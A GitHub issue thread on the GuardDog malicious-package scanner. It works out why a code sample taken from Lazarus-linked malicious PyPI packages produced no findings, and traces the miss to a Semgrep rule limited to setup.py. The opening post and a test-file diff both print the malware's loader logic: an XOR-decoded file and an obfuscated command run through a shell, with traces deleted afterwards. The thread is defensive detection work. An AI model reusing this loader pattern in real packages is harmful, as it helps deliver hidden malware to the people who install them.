New pypi exploits #311

Closed
jxdv opened this issue Feb 29, 2024 · 11 comments

@jxdv
Contributor

jxdv commented Feb 29, 2024

Sources:
https://thehackernews.com/2024/02/lazarus-exploits-typos-to-sneak-pypi.html
https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html

I zipped the following code locally, ran guarddog on the archive, and got 0 malicious indicators:

def crypt(filepath, key, strKey, no):
    inputFilePath = os.path.join(filepath, 'test.py')
    outputFilePath = os.path.join(filepath, 'output.py')
    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
    if os.path.isfile(inputFilePath):
        with open(inputFilePath, "rb") as f1:
            with open(outputFilePath, "wb") as f3:
                while True:
                    byte = f1.read(1)
                    if not byte:
                        break  # End of file

                    # Perform XOR encryption
                    encrypted_byte = ord(byte) ^ key

                    # Write the encrypted byte to output file
                    f3.write(bytes([encrypted_byte]))
        result_bytes = bytes([byte ^ strKey for byte in command])
        result_string = result_bytes.decode('utf-8')
        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
        try:
            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            os.remove(inputFilePath)
        except:
            pass
    if os.path.isfile(outputFilePath):
        os.remove(outputFilePath)
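
The value of `strKey` is not shown in this issue, so the command hidden in `command` cannot be read off directly. A minimal sketch, assuming a single-byte XOR key as in the sample: trying all 256 keys and keeping only the purely alphanumeric results recovers `rundll32` for key `0xdc`, which fits the `", CalculateSum"` export-style argument appended afterwards. The helper names `xor_decode` and `candidate_keys` are made up for this illustration.

```python
import string

# Obfuscated bytes copied from the sample above.
COMMAND = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key, as the sample does with strKey."""
    return bytes(b ^ key for b in data)


def candidate_keys(data: bytes) -> list[tuple[int, str]]:
    """Return (key, plaintext) pairs whose plaintext is only ASCII letters/digits."""
    allowed = set((string.ascii_letters + string.digits).encode("ascii"))
    hits = []
    for key in range(256):
        plain = xor_decode(data, key)
        if all(b in allowed for b in plain):
            hits.append((key, plain.decode("ascii")))
    return hits


if __name__ == "__main__":
    # Print every key that decodes the blob to something that looks like a name.
    for key, text in candidate_keys(COMMAND):
        print(f"key=0x{key:02x} -> {text}")
```

The alphanumeric filter is only a heuristic for spotting plausible executable names; a different blob might need a wider character set.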
@cedricvanrompay-datadog
Member

Weird, the subprocess.run should have been caught by

- pattern: subprocess.run($ARG1, ...)
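
For readers unfamiliar with Semgrep patterns, here is a rough Python approximation of what that pattern is expected to match: any call written literally as `subprocess.run(...)` with at least one argument. This is only an illustration built on the standard `ast` module, not how Semgrep works internally; `find_subprocess_run` and `SAMPLE` are hypothetical names.

```python
import ast


def find_subprocess_run(source: str) -> list[int]:
    """Return line numbers of calls written literally as subprocess.run(<args>)."""
    lines = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr == "run"
            and isinstance(node.func.value, ast.Name)
            and node.func.value.id == "subprocess"
            and (node.args or node.keywords)  # at least one argument
        ):
            lines.append(node.lineno)
    return sorted(lines)


# Trimmed-down stand-in for the tail of the reported sample.
SAMPLE = '''import subprocess
strcommand = "echo hi"
try:
    subprocess.run(strcommand, shell=True, check=True)
except Exception:
    pass
'''

if __name__ == "__main__":
    print(find_subprocess_run(SAMPLE))
```

The call sits inside a `try` block in the sample, which does not hide it from a syntax-tree walk, so nesting alone would not explain a miss.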

@cedricvanrompay-datadog
Member

I can reproduce the false negative:

$  pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

@cedricvanrompay-datadog
Member

And I can confirm that my reproduction method (putting the Python file in a ZIP and scanning the ZIP) is supposed to work:

$ zip -r ~/tinkering/guarddog-samples/code-execution.zip tests/analyzer/sourcecode/code-execution.py
  adding: tests/analyzer/sourcecode/code-execution.py (deflated 60%)
$ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/code-execution.zip
Found 16 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.zip

code-execution: found 14 source code matches
[...]

@cedricvanrompay-datadog
Member

However, it seems that semgrep alone does find the code execution (at line 221 in my example):

➜  guarddog git:(main) ✗ git diff tests/analyzer/sourcecode/code-execution.py
diff --git a/tests/analyzer/sourcecode/code-execution.py b/tests/analyzer/sourcecode/code-execution.py
index 1db1bd4..5956b5c 100644
--- a/tests/analyzer/sourcecode/code-execution.py
+++ b/tests/analyzer/sourcecode/code-execution.py
@@ -196,3 +196,31 @@ def run_file(path):
     # ruleid: code-execution
        p = subprocess.Popen(f"python {path}",shell=True,stdin=None,stdout=subprocess.PIPE,stderr=subprocess.PIPE,close_fds=True)
        out, err = p.communicate()
+
+def crypt(filepath, key, strKey, no):
+    inputFilePath = os.path.join(filepath, 'test.py')
+    outputFilePath = os.path.join(filepath, 'output.py')
+    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
+    if os.path.isfile(inputFilePath):
+        with open(inputFilePath, "rb") as f1:
+            with open(outputFilePath, "wb") as f3:
+                while True:
+                    byte = f1.read(1)
+                    if not byte:
+                        break  # End of file
+
+                    # Perform XOR encryption
+                    encrypted_byte = ord(byte) ^ key
+
+                    # Write the encrypted byte to output file
+                    f3.write(bytes([encrypted_byte]))
+        result_bytes = bytes([byte ^ strKey for byte in command])
+        result_string = result_bytes.decode('utf-8')
+        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
+        try:
+            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+            os.remove(inputFilePath)
+        except:
+            pass
+    if os.path.isfile(outputFilePath):
+        os.remove(outputFilePath)
➜  guarddog git:(main) ✗ pipenv run semgrep --metrics off --test --config guarddog/analyzer/sourcecode/code-execution.yml tests/analyzer/sourcecode/code-execution.py
0/1: 1 unit tests did not pass:
--------------------------------------------------------------------------------
	✖ code-execution                                               missed lines: [], incorrect lines: [221]
	test file path: /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/tests/analyzer/sourcecode/code-execution.py


No tests for fixes found.

@cedricvanrompay-datadog
Member

Wait, that's weird, guarddog does report findings depending on the filename I use in the ZIP archive:

➜  guarddog git:(main) ✗ # both files are the same
➜  guarddog git:(main) ✗ diff ~/tinkering/guarddog-samples/code-execution.py ~/tinkering/guarddog-samples/sample.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/sample.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/code-execution.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 1 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

code-execution: found 1 source code matches
  * This package is executing OS commands in the setup.py file at Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py/Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py:25
        subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

It seems to ignore the file if it is named sample.py in the ZIP archive.
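
To repeat this comparison without depending on absolute paths, a small script can write the same source into several archives that differ only in the member name. This is a sketch under assumptions: the `pkg/` prefix and the helper names are invented here, and each resulting archive would still be scanned by hand with the `guarddog pypi scan` command shown above.

```python
import tempfile
import zipfile
from pathlib import Path


def zip_single_file(archive: Path, arcname: str, source: str) -> None:
    """Write `source` into `archive` as one member called `arcname`."""
    with zipfile.ZipFile(archive, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(arcname, source)


def build_variants(workdir: Path, source: str, names: list[str]) -> dict[str, Path]:
    """Create one archive per file name, all holding identical content."""
    archives = {}
    for name in names:
        archive = workdir / f"{Path(name).stem}.zip"
        zip_single_file(archive, f"pkg/{name}", source)  # "pkg/" is an arbitrary prefix
        archives[name] = archive
    return archives


if __name__ == "__main__":
    code = "import subprocess\nsubprocess.run('echo hi', shell=True)\n"
    with tempfile.TemporaryDirectory() as tmp:
        for name, archive in build_variants(
            Path(tmp), code, ["sample.py", "foo.py", "code-execution.py", "setup.py"]
        ).items():
            with zipfile.ZipFile(archive) as zf:
                print(name, "->", archive.name, zf.namelist())
```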

@cedricvanrompay-datadog
Member

Well, it seems like GuardDog does have a list of files it will not scan with Semgrep:

self.exclude = [

However, sample.py should not match any of them, that's weird.

@cedricvanrompay-datadog
Member

Well, running guarddog with an empty self.exclude does not make the problem go away.

@cedricvanrompay-datadog
Member

foo.py gets ignored just like sample.py

➜  guarddog git:(main) ✗ sha256sum ~/tinkering/guarddog-samples/foo.py ~/tinkering/guarddog-samples/sample.py ~/tinkering/guarddog-samples/code-execution.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/foo.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog --log-level=DEBUG pypi scan ~/tinkering/guarddog-samples/sample.zip
DEBUG: Considering that '/Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip' is a local target, scanning filesystem
DEBUG: Extracting archive /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip to directory /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: content of /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd: ['/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py', '/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py']
DEBUG: No rules specified using full rules directory /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode
DEBUG: Running source code rules against /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: Invoking semgrep with command line: semgrep --config /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode --no-git-ignore --json --quiet /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

So the problem seems to be that semgrep ignores every single file unless it's named code-execution.py?

According to https://semgrep.dev/docs/writing-rules/testing-rules/:

Semgrep looks for tests based on the rule filename and the languages specified in the rule. In other words, path/to/rule.yaml searches for path/to/rule.py, path/to/rule.js and similar, based on the languages specified in the rule.

But this is just supposed to be for testing, right?

@cedricvanrompay-datadog
Member

Ah, found it! It's not a bug it's a feature ™️

# Only searches in setup.py to reduce false positives!

paths:
  include:
    - "*/setup.py"
    - "*/code-execution.py"
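
The effect of that include list on the file names tried in this thread can be sketched with Python's `fnmatch`. This is an approximation: Semgrep's own path matching may differ in details, and `is_scanned` is a hypothetical helper, not part of GuardDog or Semgrep.

```python
from fnmatch import fnmatchcase

# Include globs copied from the rule above.
INCLUDE = ["*/setup.py", "*/code-execution.py"]


def is_scanned(path: str, include: list[str] = INCLUDE) -> bool:
    """True if `path` matches at least one include glob (shell-style matching)."""
    return any(fnmatchcase(path, pattern) for pattern in include)


if __name__ == "__main__":
    base = "Users/cedric.vanrompay/tinkering/guarddog-samples"
    for name in ("sample.py", "foo.py", "code-execution.py", "setup.py"):
        print(f"{name:20} scanned={is_scanned(f'{base}/{name}')}")
```

Under this approximation only `setup.py` and `code-execution.py` pass the filter, which lines up with `sample.py` and `foo.py` producing 0 indicators earlier in the thread.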

@cedricvanrompay-datadog
Member

So, the conclusion is:

@christophetd
Contributor

Closing in favor of #312, as discussed with @cedricvanrompay-datadog.
